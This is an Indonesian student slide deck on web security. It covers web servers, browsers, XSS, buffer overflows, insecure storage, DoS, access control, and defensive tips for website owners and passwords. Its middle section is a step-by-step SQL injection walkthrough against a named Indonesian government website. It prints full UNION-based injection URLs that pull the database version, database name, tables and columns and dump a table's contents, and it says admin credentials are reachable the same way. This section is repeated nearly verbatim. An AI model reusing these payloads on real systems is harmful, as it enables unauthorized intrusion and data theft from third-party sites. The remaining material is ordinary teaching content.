Dokumen tersebut membahas berbagai topik keamanan jaringan dan website, termasuk penjelasan mengenai SQL injection, buffer overflow, dan cara-cara pencegahannya. Selain itu, dibahas pula contoh kasus pemanfaatan celah keamanan pada website pemerintah melalui teknik SQL injection."
1. KELOMPOK 4
WEB SECURITY
RAHMAT MUKODAS :12127525
CHANDRA PRATAMA :12127946
DINAR KUSUMA :18120173
ISMAIL SAPUTRA :18121434
2. Pengertian web server
Web server adalah suatu server yang memberikan
service (layanan) kepada klien yang memita
informasi berkaitan dengan web. Web Server sendiri
terdiri dari dua komponen. Yang pertama adalah
computer itu sendiri dan software web server yang
di pakainya. Jadi dapat kesimpulan mesin
(komputer) apapun bisa saja enjadi web server
asalkan software web server tersedia di mesin
(komputer)itu. Salah satu software webserver yang
tersedia adalah Apache, tapi selain itu masih banyak
lagi web server lainnya seperti ISS,Xitami dll.
3. . Web Server Apache
Apache merupakan Aplikasi Web Server yang paling banyak digunakan saat ini,
selain dapat berjalan di banyak Operating System seperti Windows, Linux dan
lainya, Apache juga bersifat Open Source alias Gratis. Secara default Apache
menggunakan Script PHP dan menggunakan MySQL sebagai Data Base nya dan
kesemuanya itu dapat di gunakan secara Gratis pula.
Kelebihan Web Server Apache
. Apache termasuk dalam kategori freeware
. Mampu beroperasi pada berbagai paltform sistem operasi
. Mudah mengatur konfigurasinya.
Kekurangan Web Server Apache
* web server Apache tidak memiliki kemampuan mengatur load seperti IIS, sehingga
akan terus mem-fork proses baru hingga nilai MaxClients tercapai atau hingga batas
yang diizinkan oleh OS. Ini tentunya menguntungkan penyerang karena habisnya
RAM akan lebih cepat tercapai
*Apache tidak memproses karakter kutip dalam string Referrer dan User-Agent yang
dikirimkan oleh Client. Ini berarti Client dapat memformulasi inputnya secara hati hati
untuk merusak format baris log akses
* Terganggunya proses upload data, yang bisa menyebabkan software salah dalam
menerjemahkan ukuran data yang masuk.
4. WB SERVER IIS
IIS atau Internet Information Services atau Internet Information Server adalah sebuah
HTTP web server yang digunakan dalam sistem operasi server Windows, mulai dari
Windows NT 4.0 Server, Windows 2000 Server atau Windows Server 2003. Layanan ini
merupakan layanan terintegrasi dalam Windows 2000 Server, Windows Server 2003
atau sebagai add-on dalam Windows NT 4.0. Layanan ini berfungsi sebagai pendukung
protokol TCP/IP yang berjalan dalam lapisan aplikasi (application layer). IIS juga
menjadi fondasi dari platform Internet dan Intranet Microsoft, yang mencakup Microsoft
Site Server.
Kelebihan IIS
1. Lebih kompatibel dengan Windows karena memang IIS adalah keluaran Microsoft
2. Untuk platform .NET, user hanya bisa menggunakan IIS
3. IIS memiliki fitur URL Filtering untuk mem-filter website yang tidak diinginkan
4. Untuk platform .NET, user hanya bisa menggunakan IIS
Kekurangan IIS
1. Tidak gratis (web server berbayar)
2. Port 80 (Port untuk layanan web) sangat mudah diserang oleh cracker
3. Keamanan file log juga sangat mudah ditembus sehingga system password pun
akan mudah didapatkan.
5. Pengertian web browser
Web Browser adalah suatu program atau software yang digunakan untuk menjelajahi
internet atau untuk mencari informasi dari suatu web yang tersimpan didalam komputer.
Awalnya, web browser berorientasi pada teks dan belum dapat menampilkan gambar.
Namun, web browser sekarang tidak hanya menampilkan gambar dan teks saja, tetapi
juga memutar file multimedia seperti video dan suara. Web browser juga dapat
mengirim dan menerima email, mengelola HTML, sebagai input dan menjadikan
halaman web sebagai hasil output yang informative.
Dengan menggunakan web browser, para pengguna internet dapat mengakses
berbagai informasi yang terdapat di internet dengan mudah. Beberapa contoh web
browser diantaranya Internet Explorer, Mozilla, Firefox, Safari, Opera, dll. Hal yang perlu
diketahui dalam pencarian suatu informasi adalah pemahaman tentang struktur
Fungsi Web Browser :
Fungsi Web Browser adalah untuk menampilkan dan melakukan interaksi dengan
dukumen-dokumen yang disediakan oleh web server.
6. Contoh Web Browser :
- Mozilla Firefox – link, yaitu dibuat oleh mozilla corporation, firefox adalah salah satu web
browser open source yang dibangun dengan Gecko layout engine. Tak hanya handal firefox juga
didukung oleh sejumlah Add-ons yang dapat diinstall terpisah yang memungkinkan pengguna
melakukan sesuai dengan kegunaan Add-ons tersebut.
- Internet Exporer – link, yaitu Web browser besutan Microsoft Corporation biasanya dikenal
dengan nama pendek IE, sejak 1995 IE mulai di masukan sebagai default sotware pada saat
instalasi Sistem Operasi Windows, sejak tulisan ini dibuat IE belum lama ini meluncurkan versi IE8.
- Safari – link, yaitu Dibuat oleh Apple Inc, perusahaan yang juga memproduksi komputer
Macintosh, iPod, dan juga iPhone. dibangun dengan browser engine WebKit, WebKit juga adalah
browser engine pertama yang lulus test Acid3.
- Flock – link, yaitu Flock adalah web browser yang dibangun dengan code mozilla frefox yang
web browser ini khususkan menyediakan social networking dan Web 2.0. Flock didesain untuk
memudahkan aktivitas online pengguna internet mengatur beberapa social networking, web mail,
news feeds dan blogs yang mereka miliki. Dengan Mengunakan Flock mereka dapat dengan
mudah menjelajah, berbagi, dan menikmati content maupun menjalin hubungan di situs
pertemanan yang mereka inginkan.
- Opera – link, yaitu Opera dikembangkan oleh Opera Software company adalah salah satu
Web Browser dan juga Internet Suite. Jika firefox punya Add-ons, Opera punya “Opera Widgets”,
sebuah aplikasi web kecil yang dijalankan bersamaan dengan Opera yang mempunyai kegunaan
tertentu, layaknya Add-ons firefox.
7. unvalidated input
-cross site scripting
XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.
XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS
dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script
codelainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut.
Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien,
mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan
untuk cascade style sheet.
- buffer overlows
Buffer Overflow merupakan salah satu penyebab yang paling banyak menimbulkan
masalah pada keamanan komputer baik yang bersifat lokal maupun jaringan.
Serangan Buffer overflow terjadi ketika si Attacker memberikan input yang berlebihan
pada program yang di jalankan, sehingga program mengalami kelebihan muatan dan
memory tidak dapat mengalokasikannya. Ini memberikan kesempatan kepada Attacker
untuk menindih data pada program dan men-takeover control program yang dieksekusi
attacker.
8. Dengan tersedianya program-program eksploitasi di Internet, baik dalam bentuk source
code maupun binary seringkali menjadi menjadi alat untuk membuka celah keamanan
sehingga membuat orang tertarik untuk melakukan eksperimen yang sporadis tanpa
memperdulikan akibat yang dapat ditimbulkannya. Banyak orang yang mengklaim
dirinya sebagai seorang cracker jika sudah berhasil mengekspoitasi komputer orang
lain, tanpa memahami cara kerja eksploitasi tersebut sesungguhnya.
Buffer overflow merupakan hasil dari dari kelemahan bahasa pemrograman c, c++,
fortran, dan assembly, yang tidak secara otomatis melakukan pengecekan batas input
ketika program dieksekusi. Sebagai akibat dari Buffer overflow dapat menyebatkan
crash pada program, atau mempersilahkan si Attacker untuk mengeksekusi perintah
atau koding jahatnya untuk menguasai sistem target, seperti tujuan mengambil alih akun
root menggunakan metode Buffer overflow. Dan penyebab terjadinya buffer overflow,
Pada banyak kasus, eksploitasi buffer overflow digunakan untuk melakukan
penyerangan terhadap aplikasi tertentu dan bahkan pada system operasi tertentu. Pada
dasarnya, setiap kali program membaca atau meng-copy data kedalam buffer, ia akan
mengecek dahulu apakah ada cukup space/ ruang untuk melakukan copy. Suatu
perkecualian adalah jika dapat menunjukkan hal itu tidak dapat terjadi, tetapi
kebanyakan program akan berubah setiap saat yang dapat membuat yang tak mungkin
menjadi mungkin. Biasanya, pada pemrograman yang menggunakan C/C++ lah yang
banyak terjadi kasus kasus buffer overflow,
9. Overwriting Function’s Return Addresses
Seperti yang kita tahu, sangat mudah untuk melakukan overwriting function’s return
addresses, attacker menggunakan teknik buffer overflow untuk mendapatkan akses
root. Attacker mencoba mengesekusi buffer buffer overflowwing area, menimpa nilai dari
return address yang mengisi nilai ke buffer dan mengesekusi kode jahatnya. Sebagai
kode yang bisa dimasukkan ke dalam program menggunakan environment variabel atau
program input parameters. Sebagai contoh coding yang bisa mendapatkan shell akun
root pada paper yang ditulis oleh aleph One untu Phrack Magazine
di http://destory.net/machines/security/p49-14-aleph-one
Tindakan Untuk Mencegah Buffer Overflow
Tidak satupum metode yang dijelaskan di bawah yang benar-benar bisa mencegah
kemungkinan serangan, namanyajuga manusia tempatnya salah dan lupa. Tetapi
metode dibawah ini, dapat meminimalisir dari kegiatan buffer overflow yang
mengakibatkan kerusakan stack.
10. 1. Menulis kode yang aman : Buffer overflow adalah hasil dari input yang berlebihan ke dalam
buffer. C library seperti strcpy (), stcat (), sprintf () dan vsprintf beroperasi pada null terminated
strings dan tidak mengecek batasan input. Gets () juga fungsi lainnya yang memasukkan input ke
dalam buffer dari stdin. Pada scanf () juga bisa mengakibat buffer overflows.
2. Stack execute invalidation: karena koding jahat (contoh, instruksi assembly untuk mengambil
alih root shell) merupakan input rgument ke dalam program, ini tersimpan ke dalam stack dan
bukan dalam code segment. Oleh karena itu solusi mudahnya adalah tidak memperboleh adalah
tidak memperbolehkan stack mengesekusi intruksi apapun. Kode apapun yang dieksekusi dengan
kode lainnya di dalam stack dapat mengakibatkan segmentation violation.
3. Compiler tools : Beberapa tahun terakhir, compiler mempunyai kemampuan lebih. Beberapa
compiler di lengkapi peringatan dalam menggunakan kostruk yang tidak aman seperti gets (), strpy
() dan sejenisnya sebagai contoh:
Int main (){
Char*str = (char*) malloc (10);// mengalokasikan 10 bytes untuk str
Gets (str);// membaca input dari stdin dan disimpan ke str
}
Setelah di compiler tool mempunyai fitur untuk bounds checking, jadi meng generate kode yang
built-in tanpa mengubah struktur kode yang dapat menghindarkan penggunaan ilegal address tidak
diperbolehkan untuk eksekusi. Gunakanlah patch GCC untuk mendapatkan fitur mendapatkan fitur
bounds checking, dapat anda temui dihttp://web.inter.nl.net/hcc/Haj.Ten.Brugge patch ini juga
mencegah tindakan penimpaan return adress, seperti yang banyak terjadi. Dan juga gunakan tools
stackshield di
http://www.angelfire.com/sk/stackshield/index.html .
11. injection flaws
Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan
pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan
memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur
basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi,
seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data
tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui
username atau id dan password admin pengelola website tersebut.
SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama
diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya
adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan
Teknologi Republik Indonesia dengan alamat url : http://....go.id
Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan
pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan
memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur
basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi,
seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data
tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui
username atau id dan password admin pengelola website tersebut.
12. SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama
diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya
adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan
Teknologi Republik Indonesia dengan alamat url : http://....go.id
Gambar 1. Halaman utama website
Bagaimana sebuah website bisa diketahui memiliki kelemahan untuk di lakukan sql
dengan memasukan karakter- atau ` ke dalam halaman website yang memiliki karakter
angka, misalnya : http://drn.go.id/index.php?option=com_frontpage&catid=13 ,sehinga
didapat error page seperti gambar di bawah ini. Error SQL ini merupakan salah satu
kelemahan dalam membangun struktur basis data dalam mendefinisikan type data.
13. Gambar 2.error page
Error SQL yang terlihat, dapat dimanfaatkan untuk mengetahui nama database dan table-table
dalam databse tersebut yang digunakan sebagai basis data website ini.
Untuk mengetahui nama databasenya adalah dengan menambahkan sintak ‘ and 1=2 by n`pada
akhirnya alamat url, dimana n=12345,...,n dimasukan satu per satu nilai n tersebut, sehingga error
page berubah menjadi ‘unknown coloum’
14. Gambar 3. error unkown coloum
Pada website ini error ‘unkown column’ yang ditemukan adalah mengetahui versi mysql dan
username administrator database, yaitu dengan memasukkan sintak `and 1=2 union select
version(), 2-`sehingga diketahui versi mysqlnya adalah versi 5.
15. Gambar 4. diketahui versi mysql
Dan selanjutnya untuk mengetahui nama username dan databse pada website ini adalah
dengan mengganti sintak version (), menjadi databsse dan user (), contohnya adalah alamat url
berikut ini:
http://www.drn.go.id/index.php?option=isi&task=view&id=-
281+and+1=2+union+select+database(),2--&Itemid=2
Gambar 5. diketahui nama database
Dan setelah nama databasenya, akan mudah untuk mengetahui nama tabel-tabel pada database tersebut,
adalah dengan memasukkan sintak `and 1=2 union select group_concat (table_name) from
information_schema.tables where table_schema=database ()- `pad akhir alamat url, menjadi :
http://www.drn.go.id/index.php?option=isi&task=view&id=-
281+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+where+table_
schema=database()--&Itemid=2
maka akan diketahui nama-nama tabel pada database tersebut seperti pada gambar dibawah ini
16. Gambar 6. nama table-table pada database
Terlihat nama table-table pada database ini adalah agenda batas_orangjam, buku_alamat,
dimanam direktori, direktori_url, disposisi_surat, fasilitas, file,tb, forum, grup, grup_pengguna,
hasil_jajak,_pendapat, ing_core_acl_aro, ing_core_acl_aro_groups, ing_core_acl_aro_sections,
ing_core_acl_group_aro_map,ing_core_log_items,ing_core_log_sear
Setelah mengetahui struktur tabel pada database ini, akan mudah untuk mengetahui nama kolom-
kolom pada tabel-tabel tersebut adalah dengan memasukkan sintak : `and 1=2 union select
group_concat (table_name) from information_schema.tables where
table_name=mysqlchar(table_name)-,bagaimana mendapatkan nilai mysqchar adalah dengan
mengkonversi nama tabel menjadi bantuan sql pada localhost kita, nama tabel agenda dikonversi
menjadichar (97,103,101,110,100,97).
Sehingga alamat url menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=-
281%20and%201=0%20union%20select%20group_concat(column_name),2%20from%20informati
on_schema.columns%20where%20table_name=CHAR(97,103,101,110,100,97)--&Itemid=2
Dan didapat nama kolom pada tabel agenda seperti pada gambar
17. Injection Flows
Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan
pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan
memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur
basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi,
seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data
tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui
username atau id dan password admin pengelola website tersebut.
SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama
diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya
adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan
Teknologi Republik Indonesia dengan alamat url : http://....go.id
18. Gambar 1. Halaman utama website
Bagaimana sebuah website bisa diketahui memiliki kelemahan untuk di lakukan sql dengan
memasukan karakter- atau ` ke dalam halaman website yang memiliki karakter angka, misalnya
: http://drn.go.id/index.php?option=com_frontpage&catid=13 ,sehinga didapat error page seperti
gambar di bawah ini. Error SQL ini merupakan salah satu kelemahan dalam membangun struktur
basis data dalam mendefinisikan type data.
19. Gambar 2.error page
Error SQL yang terlihat, dapat dimanfaatkan untuk mengetahui nama database dan
table-table dalam databse tersebut yang digunakan sebagai basis data website ini.
Untuk mengetahui nama databasenya adalah dengan menambahkan sintak ‘ and 1=2
by n`pada akhirnya alamat url, dimana n=12345,...,n dimasukan satu per satu nilai n
tersebut, sehingga error page berubah menjadi ‘unknown coloum’
20. Gambar 3. error unkown coloum
Pada website ini error ‘unkown column’ yang ditemukan adalah mengetahui versi
mysql dan username administrator database, yaitu dengan memasukkan sintak `and
1=2 union select version(), 2-`sehingga diketahui versi mysqlnya adalah versi 5.
21. Gambar 4. diketahui versi mysql
Dan selanjutnya untuk mengetahui nama username dan databse pada website ini adalah dengan
mengganti sintak version (), menjadi databsse dan user (), contohnya adalah alamat url berikut ini:
http://www.drn.go.id/index.php?option=isi&task=view&id=-
281+and+1=2+union+select+database(),2--&Itemid=2
22. Gambar 5. diketahui nama database
Dan setelah nama databasenya, akan mudah untuk mengetahui nama tabel-tabel pada database
tersebut, adalah dengan memasukkan sintak `and 1=2 union select group_concat (table_name)
from information_schema.tables where table_schema=database ()- `pad akhir alamat url,
menjadi :
http://www.drn.go.id/index.php?option=isi&task=view&id=-
281+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+w
here+table_schema=database()--&Itemid=2
maka akan diketahui nama-nama tabel pada database tersebut seperti pada gambar dibawah ini
23. Gambar 7. nama kolom pada tabel agenda
maka diketahui, nama kolom pada tabel agenda adalah kode_agenda pemilik, judul, tipe, tgl_mulai,
waktu_mulai, waktu_selesai, kode_pengulangan, kode_undangan, deskripsi, tgl_dibuat, tgl_diubah,
sharing_publik, sifat_sharing, undang_via_email, undang_via_sms.
Terakhir untuk mengetahui isi dari kolom-kolom tersebut adalah dengan memasukkan sintak `and
1=2 union select group_concat(nama_kolom0x3a,nama_kolom lainnya) from nama_table-
Sehingga url menjadi :
http://www.drn.go.id/index.php?option=isi&task=view&id=-
281+and+1=2+union+select+group_concat(kode_agenda,0x3a,pemilik,0x3a,judul,0x3a,tipe,0x3a,tg
l_mulai,0x3a,waktu_mulai,0x3a,waktu_selesai,0x3a,kode_pengulangan,0x3a,kode_undangan,0x3a
,deskripsi,0x3a,tgl_dibuat,0x3a,tgl_diubah,0x3a,sharing_publik,0x3a,sifat_sharing,0x3a,undang_via
_email,0x3a,undang_via_sms),2+from+agenda--&Itemid=2
24. Gambar 8. isi kolom pada tabel agenda
Maka selanjutnya sql injection inid apat dimanfaatkan oleh orang yang tidak bertanggung jawab
untuk mengetahui nama username dan administrasi untuk login sebagai administrator website
ini.
25. VII Insecure storage
Aplikasi web biasanya perlu menyimpan informasi yang sensitif seperti password, informasi kartu
kredit, dan yang lain. Dikarenakan item-item tersebut bersifat sensitif item-item tersebut perlu
dienkripsi untuk menghindari pengaksesan secara langsung. Akan tetapi beberapa metode enkrips
lemah dan masih bisa diserang.
Berikut ini beberapa kesalahan yang sering terjadi :
•Kesalahan untuk mengenkripsi data penting.
• Tidak amannya kunci, certificate, dan password
• Kurang amannya tempat penyimpanan data
• Kurangnya perhitungan dari rekomendasi
• Kesalahan pemilihan algoritma
• Mencoba untuk menciptakan algoritma enkripsi yang baru.
Berdasarkan skenario berikut ini : Terdapat sebuah aplikasi, dimana terdapat password pada user
object. Akan tetapi, aplikasi menyimpan user objek ke dalam session setelah user login.
Permasalahan yang akan muncul pada skenario ini adalah password dapat dilihat oleh seseorang
yang dapat melihat session user tersebut.
Salah satu cara yang dilakukan untuk menghindari kesalahan penyimpanan informasi yang sensitif
adalah : tidak membuat password sebagai atribut dari kelas yang mewakili informasi user; Daripada
mengenkripsi nomor kartu kredit dari user, akan lebih baik untuk menanyakannya setiap kali
dibutuhkan.
Selain itu, menggunakan algoritma enkripsi yang sudah ada akan lebih baik daripada membuat
algoritma sendiri. Anda cukup memastikan algoritma yang akan digunakan telah diakui oleh public
dan benar-benar dapat dilaksanakan.
26. VIII Deniel of Service
Deniel of Service merupakan serangan yang dibuat oleh hacker yang mengirimkan request dalam
jumlah yang sangat besar dan dalam waktu yang bersamaan. Dikarenakan request-request
tersebut, server menjadi kelebihan beban dan tidak bisa melayani user lainnya.
Serangan DoS mampu menghabiskan bandwidth yang ada pada server. Selain itu dapat juga
menghabiskan memory, koneksi database, dan sumber yang lain.
Pada umumnya sangat sulit umtuk melindungi apliksi dari serangan ini. Akan tetapi masih ada cara
yang dapat dilakukan seperti membatasi resource yang dapat di akses user dalam jumlah yang
minimal. Merupakan ide/cara yang bagus untuk membuat load quota yang membatasi jumlah load
data yang akan diakses user dari sistem.
Salah satu contoh adalah pada implementasi bulletin board : adanya pembatasan user pada ssaat
melakukan search, dimana operasi ini hanya dapat dilakukan setiap 20 detik. Dengan cara ini
dapat dipastikan bahwa user tiadk bisa menghasbiakan koneksi dari database.
Solusi yang lain adalah mendesain aplikasi web dimana user yang belum terotorisasi hanya
memiliki akses yang sedikit atau tidak memilki akses ke content web yang berhunbungan dengan
databse.
IX Insecure Configuration Management
Biasanya kelompok (group) yang mengembangkan aplikasi berbeda dengan kelompok yang
mengatur hosting dari aplikasi. Hal ini bisa menjadi berbahaya, dikarenakan keamanan yang
diandalkan hanya dari segi aplikasi : sedangkan dari segi server juga memiliki aspek keamanan
yang perlu diperhatian, Adanya kesalahan dari konfigurasi server dapat melewati aspek keamanan
dari segi aplikasi.
Berikut ini adalah kesalahan konfigurasi server yang bisa menimbulkan masalah :
27. II Broken Access Control
Banyak aplikasi yang mengkategorikan user-usernya ke dalam role yang berbeda dan level yang
berbeda untuk berinteraksi dengan content yang dibedakan dari kategori-kategori tersebut, salah
satu contohnya, banyak aplikasi yang terdapat user role dan admin role: hanya admin role yang
dijinkan untuk mengakses halaman khusus atau melakukan action melakukan action
administration.
Masalahnya adalah beberapa aplikasi tidak efektif untuk memaksa agar otomatis ini bekerja
contohnya, beberapa program hanya menggunakan sebuah chekpoint dimana hanya user yang
terpilih yang dapat mengakses: untuk proses lebih lanjut, user harus membuktikan dirinya
menjalankan pengecekan dari chek point sebelumnya: dimana apabila user berhasil melewati
halaman login, mereka dapat bebas menjalankan operasi.
Masalah lain yang berhubungan dengan access control adalah :
a. Insecure Ids (Id Tidak aman) – beberapa site menggunakan id atau kunci yang menunjukan
kepada user atau fungsi. ID dapat juga ditebak, dan jika hacker dapat mudah menebak ID dari user
yang terautorisasi, maka site akan mudah diserang.
b. File permissions- kebanyakan web dan aplikasi server percaya kepada external file yang
menyimpan daftar dari user yang terotorisasi dan resources mana saja yang dapat dan/atau tidak
dapat di akses. Apabila file ini dapat di baca dari luar, maka hacker dapat memodifikasi dengan
mudah untuk menambahkan dirinya pada daftar user yang diijinkan.
Langkah –langkah apa saja yang dapat di lakukan untuk mengatasinya? Pada contoh-contoh tadi,
kita dapat mengembangkan filter atau komponen yang dapat di jalankan pada sensitive resources,
filter atau komponen tadi dapat menjamin hanya user yang terotorisasi dapat mengakses. Untuk
melindungi dari inseure Ids yang dapat memberi acess control, pada masalah file permission, file-
file tersebut harus berada pada lokasi yang tidak dapat di akses oleh web browser dan hanya role
tertentu saja yang dapat mengaksesnya.
28. Cara Mengatasi Ancaman Hacker Dan Cracker
Ada banyak jenis software untuk mengatasi ancaman dari Hacker, salah satunya adalah
Zona Alarm. Zone Alarm di design untuk melindungi komputer PC, Laptop maupun
Netbook dari ancamana hacker di internet. . Software ini memiliki 4 fungsi keamanan
yaitu:
•Firewal; Firewall pada zone alarm berfungsi untuk mengendalikan akses masukke
komputer anda dan meminta izin untuk mengakses situs/web yang ingin anda kunjungi
dengan demikian anda memiliki kesempatan untuk cek web tersebut layak atau tidak
dibuka, biasanya situs/web yang mengandung pornografi, content dewasa, dllSelain itu
juga anda dapat mengatur tingkat keamanan internet zona security dan trusted zona
security.
•Aplication Control; Aplication Control berfungsi untuk mengontrol program-program
yang beroperasi membutuhkan akses internet seperti: Internet Explorer, Mozilla, FTP,
dll. Nah dengan bantuan fitur ini tentu mengurangi resiko terhadap serangan/ancaman
langsung dari hacker yang sedang online.
•Anti Virus Monitoring; Antivirus Monitoring berfungsi untuk memonitor status dari
ancaman virus yang masuk ke komputer anda baik online maupun offline.
• Email Protection; Dari namanya tentu anda tahu fungsinya?, benar fungsi dari Email
Protection adalah melindungi email dari ancaman virus, malware, dll.
29. Mengatasi Sarangan Hacker Pada Website
• Login ke cpanel, pastikan ’Last Login From’ tercantum IP publik anda Langkah pertama adalah mengecek pada
bagian “Last login from” melalui panel kontrol anda. Pastikan harus selalu tercantum alamat IP publik dari mana
terakhir kali anda melakukan login. Bagaimana cara menemukan IP publik kita? Cara termudah adalah dengan
membuka situs domain checker semacam http://who.is. Biasanya tepat pada portalnya akan muncul tulisan Your
IP is 183.7.xxx.xxx. Itulah alamat IP publik anda.Kembali lagi jika pada “Last login from” tercantum alamat IP lain
yang tidak anda ketahui, catat. Hal ini berbahaya sebab logikanya jika alamat IP lain bisa login ke kontrol panel
kita, berarti mereka memiliki username, password, dan semua akses ke situs kita. Dan inilah indikasi awal bahwa
website kita mendapat serangan.
• Menyalakan fitur Log ArchivingWebsite akses log menyimpan rekaman mendetail tentang siapa yang melakukan
koneksi ke situs kita, baik melalui HTTP (pengunjung normal) maupun melalui FTP (transfer file). Umumnya, log
tersebut dihapus setiap harinya. Padahal peranan akses log sangatlah penting. Agar akses log tidak terhapus,
lakukan langkah berikut : Login ke cpanel > Raw Log Manager, Cek pada kotak “Archive Logs”, Uncek pada
kotak “Remove the previous month’s archived logs”, Klik Save
•Langkah darurat; segera offline kan website anda Jika halaman anda terinfeksi virus yang memiliki kemungkinan
virus tersebut bisa menyerang pengunjung situs anda, maka segera lindungi pengunjung anda dan juga reputasi
anda. Yaitu dengan membuat website anda berstatus offline. Bisa dengan menambahkan beberapa baris kode
pada .htaccess, maupun mengupload tampilan halaman under construction. Jika anda melakukannya dengan
segera, anda memiliki kemungkinan untuk menghindarkan situs anda mendapat predikat “This site may harm your
computer” dari Google. Selain itu, penyerang biasanya telah menginstal backdoor script pada halaman index
anda yang memungkinkan mereka untuk kembali ke server anda. Menetapkan status offline pada situs anda
sementara, sedikitnya memiliki kemungkinan untuk mengunci dan membuat penyerang tidak bisa masuk melalui
backdoor yang telah diinstal.
30. •Semua administrators situs melakukan scan pada PC masing-masin Fakta bahwa di tahun 2009, penyebab
nomor satu dari hacking website adalah PC webmaster yang terinfeksi oleh malware. Malware semacam gumblar,
dan martuz (yang telah kita bahas pada edisi sebelumnya, red.) Bertindak sebagai jembatan dalam mencuri
informasi login FTP dan mengirimkannya ke komputer remote. Komputer remote inilah yang kemudian menyuntik
halaman website korban dengan javascript atau iframes tersembunyi yang mengarahkan pengunjung website
korban ke website berbahaya yang menyimpan gumblar dan martuz lainnya. Untuk menghindarinya, pastikan
setiap orang yang memiliki akses password ke website anda melakukan setidaknya dua kali scan antivirus dan
antispyware pada local komputer masing-masing dengan scanner yang bervariasi. Karena selama PC webmaster
terinfeksi, mengubah password situs tidak akan berpengaruh sama sekali. Bukankah password baru dengan
mudah dapat dicuri lagi?
•Ganti semua password anda Setelah PC administrator bebas dari virus dan spyware, gantilah semua password
yang berhubungan dengan situs anda. Panel kontrol, FTP, koneksi database, email akun, dan halaman
administrator anda. Pergunakan kombinasi password yang kuat Yaitu password yang tidak mudah ditembus
karena mengandung kombinasi kata, angka, dan karakter yang rumit.
•Upgrade semua third party script ke versi terbaru Serangan semacam Remote File Inclusion (RFI)
memanfaatkan vulnerability pada script versi lama dari script third party kita untuk menyusup ke dalam situs kita.
Dan satu-satunya cara untuk menangkal serangan RFI ini adalah menggunakan versi terbaru dari script third
party yang telah memiliki kekebalan terhadap RFI. Baik plugin, addon website hingga Content Management
System (CMS) anda, segera upgrade ke versi terbaru. Jika anda menggunakan CMS semacam Joomla maupun
wordpress, anda bisa mengikuti perkembangan rilis terbaru melalui situs resmi masing-masing CMS yang anda
pakai. Update versi wordpress bisa dicek melalui wordpress.org, Joomla pada joomla.org, dan sebagainya. Cek
juga situs secunia.com, sebuah situs yang berisi laporan sekuriti setiap third party script. Halaman situs
secunia.com mendaftar kerentanan yang ditemukan pada plugin atau addon. Dengan mengecek di halaman
tersebut, anda mengetahui apakah third party script yang anda pergunakan aman atau terdapat vulnerability di
dalamnya.
31. Beberapa Tips Membuat Password Anti Hacker
• Jangan menggunakan password yang sama untuk berbagai macam layanan,
misalnya password email Anda sama dengan password facebook. Ini berarti
• seseorang yang dapat menjebol password facebook Anda, bisa juga menjebol
password email Anda. Sementara di mata hacker menjebol password facebook lebih
mudah daripada menjebol email Yahoo. Admin atau “orang dalam” facebook tahu
password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
• Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password
Anda. Email ini dikirim oleh hacker.
•Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya
jangan memasukkan password yahoo di situs facebook untuk alasan apapun (misalnya
import address book).
•Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya
mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau facebook.com
buka facecrut.com atau yang lain.
•Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik
password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan
program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste
dari huruf acak.